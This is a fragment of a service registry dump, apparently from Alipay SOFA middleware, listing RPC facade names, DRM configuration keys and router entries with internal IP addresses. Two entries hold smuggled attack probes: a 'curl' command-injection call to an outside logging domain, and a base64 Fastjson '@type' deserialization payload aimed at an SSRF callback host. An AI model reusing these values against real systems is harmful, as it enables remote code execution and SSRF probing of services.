isoropen.common.service.facade.api.InvestTradeOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.facade.stuff.api.AttachmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.chargefront_RevenueDataSource.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.findecision:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fppolicygw.facade.msg.MessageCentreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.databus.common.manage.facade.DatabusCoverageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.23.243#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilesearch.common.service.facade.SearchRecommendFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.words.AppxEntityWordsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.basic.knowledge.facade.BasicKnowledgeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphad.common.service.facade.markresult.api.IMarkResultTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.pointcore.facade.api.point.PointFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zskynet:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyDoubleCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.AntVip-Server:name=com.alipay.antvip.server.conf.DrmControl.printIfVipDomainChangedSizeLessThan,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fporgassetcenter.common.service.facade.api.ConfigInfServiceFacade:1.0:fporgassetcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.service.facade.fundmodel.fundanalyze.physicaltransactionfund.collectionagent.CollectionAgentPhysicalTransactionFundModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.metaservice.facade.workspacegroup.WorkspaceGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.EventReportCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.98.72#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cifcommon.business.platform.certdoc.common.facade.UserCertDocQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.core.config.drm.DrmXtsContextAllowNullSwitchConfigInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.limitActivePlanNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebppgw.facade.mng.IndustyrgwMessageTransactionConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cif.facade.CustomizationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finbatch:name=com.alipay.supergwlite.components.umessage.UniMsgConfigResource.openXStreamWhiteListFunction,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zappinfo:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:mrchcommerce@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csmonitor.common.service.facade.interview.ChInterviewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatabus:name=com.alipay.zdatabus.common.agent.drm.ZdatabusClientTairRetryDRM.retryRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.recadmin.common.service.facade.SceneComponentRefFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","datacaptain@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antiep.common.service.facade.AntiepOpActivitySideFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetinsight.common.service.facade.api.DataSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbpromocore.common.service.backendfacade.api.CampManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.micloan.agdslibra.facade.service.AgdslibraInterfaceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iregulation.common.service.facade.spi.TransactionInfoQuerySpi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.punishcenter.process.ProcessTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csconfig.service.mng.facade.api.AppManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_G_SETTLEGW_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.exratecenter.service.facade.api.ExSourceRateQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofabootrpcserver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:basement-dqcoupontoolstwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dataclassification.facade.service.DcpDataClassFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.amldata.com.service.facade.api.UctFeatureService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.ScardOpenAccountResource.scardOpenAccountSwithOn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.eco.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.guardianconsole.facade.configs.service.GuardianServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.tool.TaskHandlerRetryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:alipayservercore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.token.spi.SecurityPolicyVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinwormhole.common.service.facade.api.RealTimeIncrementDataService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.211#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inshealthprod.facade.InsureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbuservice.common.service.facade.DataSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antb_processCallback_antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbclaimprod.common.service.facade.ClaimSurveyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:secbianque@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.finfocoreTairCache_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yebquery.common.facade.service.AnnivUserDataQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.biz.rpc.service.SuggestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.arrangement.ArrangementPageQueryStdFacade:1.0:zhiMaArrangementPageQueryStdFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_1120#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:fascore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.openhome.facade.pamir.login.PamLoginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.mwalletmng:name=com.alipay.common.webx.session.drm.SessionLogDrm.sessionDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.227.230#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finstore.common.service.facade.fop.bops.DynamicModuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgopen.container.facade.api.KgOnlineServiceInvokeFacade:1.0:offlineainlp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ctuofflineplt.common.facade.service.DpAvailableService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.consumequery.common.service.facade.ConsumeRecordRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ap.bizprod.common.service.facade.api.PasswordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.75.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:itemProcessApplyHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promox.facade.crowd.CrowdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.InstitutionDrmResource.grantUseSignCardIdSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.frdecision.common.service.facade.api.ClearingRetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloandecision.common.service.facade.service.PcLoanProdShowDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlinkdata.common.service.facade.account.accountrelation.service.AccountComplexRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.23.137#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zcache:name=com.alipay.zdal.ldc.tair.yingxutestRZTBaseCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.137.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cschannel.common.service.facade.api.prod.mng.ServProdCompInstService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.97.235#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservicesinspect.common.service.integration.unitestcenter.QualityInfoQueryClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:csbizcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.PcardFundFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.admin.PackageMountManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandConditionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instopen.service.facade.InstPartnerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.160.249#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.159.204.194#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secucommunity.common.service.facade.labelmanage.api.LabelManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kmi.common.service.facade.AppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:minitrans@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.facade.ArticleComponentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:iotbsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:testmeshend@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeapcore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.appstore.common.service.facade.promotion.PromotionOrderRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmissione_benefitTemplateFailCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bkdatainspect@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.service.facade.FundFlowRouteFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.BizUnitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.facade.antha.CompatibilityIssueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custrelation.service.facade.mu.TransferRelationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbusinessprod.common.service.facade.api.AggPayManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.gfpayment.PaymentRealTimeBlockFacade:1.0:gfcenter_AP_PaymentInquiry@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.process.ProviderBehalfApplyProcessFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.asop.common.service.facade.AsopRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:exctrade.product.StandardExchangeProduct@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@promoplaycenter#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.datachange.facade.api.SceneManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdKeyConfigMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.trade.CashingInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.offer.OfferSaleUnitManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.bizprodmng:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_BKEBANK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.kabaocore.service.facade.VoucherQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finbaservice.biz.shared.rt.RiskValQuestionRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditamount.service.PcreditAmountOpenQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcactivitycore.facade.benefit.BenefitBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.jdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditchannel.facade.common.service.IdentityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_IEXCHANGE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mitemcenter.biz.service.impl.test.EventTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.arcstudio.common.service.facade.SystemFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.common.service.facade.execute.HeartbeatCheck:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.protocol-https:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.253.68#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcs.test.zhancheng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:overseaexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:alphad@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.dispatch.RelationRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdp.common.service.facade.mng.DeliverPlanMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.taobao.hsf.triple.lifepay.LifepayTaobaoService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:curl http://GIYHU5BSMQWTC5LVPJRW2LK7NFXHA5LUL5RWQYLSONSXILLEHFZTO3DZMFTQ----.rce.scan.noble.dn5l0g.co@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmerchant.service.facade.HBActivityV2ManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileic.common.service.facade.ctid.spi.CtidOpenApi:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.org.OrganizationMemberFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeprod.service.facade.UserProfileQueryClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_P_FAS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.huizhifu.quality.service.facade.api.PatrolUniformServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.material.SceneOfferMaterialConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:publicDomain_recneptune@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfundprod.common.service.facade.transfer.api.BatchTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sync.58test3#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.icif.service.facade.apiv2.ContactWayQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.limitcenter.service.facade.accumulate.api.UnifiedLimitAccumulateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.publiccore.common.service.facade.qrcode.PublicQRCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropgn.common.service.facade.FraudReportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:rpartnerweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finfoprod.common.service.cds.facade.TemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.credible.CredibleIPWriteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.153.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.innertrans.facade.api.InnerAccountInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instsvcmarket.common.service.facade.AdsPromotionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.sceneinvest.starwish.api.StarWishPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.mosn.MosnAppInvokeService:1.0:agdsccalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:dmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.asr.dataservice.client.service.StoreReadService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.CodeRouteService:1.0:distinguishprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_DEDUCT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.nfcc.common.service.facade.IntlGrayControlQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ofpgrowth.common.service.facade.spi.HomePageOfflinePaymentConsultService:1.0:homepage_paytask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.OfflinepayCardLinkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assetxp.common.service.facade.api.AssetExchangeConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.142#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.settlequery.common.service.facade.withdraw.api.OnlineWithdrawSingleQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:eyJAdHlwZSI6ICJqYXZhLm5ldC5JbmV0QWRkcmVzcyIsInZhbCI6Ik16TXdNalE0TmprdExURXlNVEF3TVRBd013LnNzcmYubm9ibGUubG9nLmx5bm5zaGFyZS5jYyJ9@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.checkroute.common.service.datatool.DataQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.loadTestZdatabusTairCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.ipaybizcache.client.read.ICacheReadService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antemc.service.facade.EmcReplayFacade:1.0:antemc_replay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.common.service.facade.merchant.api.query.OmpRecruitInviteQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.backend.ReservationLabelInfoBackendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_EC_RCINSPECT_INSPECT_INIT_ORDER_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.custcenter.bizservice.facade.ShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.workflowxTBaseCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfmng:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fininfo:name=com.alipay.finnet.service.drm.ChannelFilterDRM.tntInstIdSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.zpaas.zappinfo.facade.query.ArchDomainUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antbrain@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.settling.common.service.facade.SettlingAssistantInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.biz.shared.audit.ContentAuditFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.api.ShopPrincipalRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.assets.api.facade.service.GroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.cert.facade.CertManageCmdService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbcheck.common.service.facade.api.UserGroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumecenter.common.service.manager.facade.NexusItemEditRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecLabelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.252.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.ucdpmng.facade.UcdpCdrmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.124.179.226#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.libracloud.common.service.facade.api.HBPreLoanRecService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.prodcore.service.api.service.ServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antlink.tuling.common.service.api.TestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.insure.AutoInsRemindFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iopencore.common.service.manager.ProductDTOManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.OfflinepayCertFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.common.service.facade.spi.service.MobileSearchSpiService:1.0:recmars@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturecloud.common.service.facade.FeatureComputingFacade:1.0:antsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.${fluxconf_app_name}:name=com.alipay.fc.fluxconf.fluxconfClient.drm.CtrlDataResource.pageRows,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloud.sh.common.service.facade.AntcloudFeatureFacade:1.0:apfasmng-default@DEFAULT#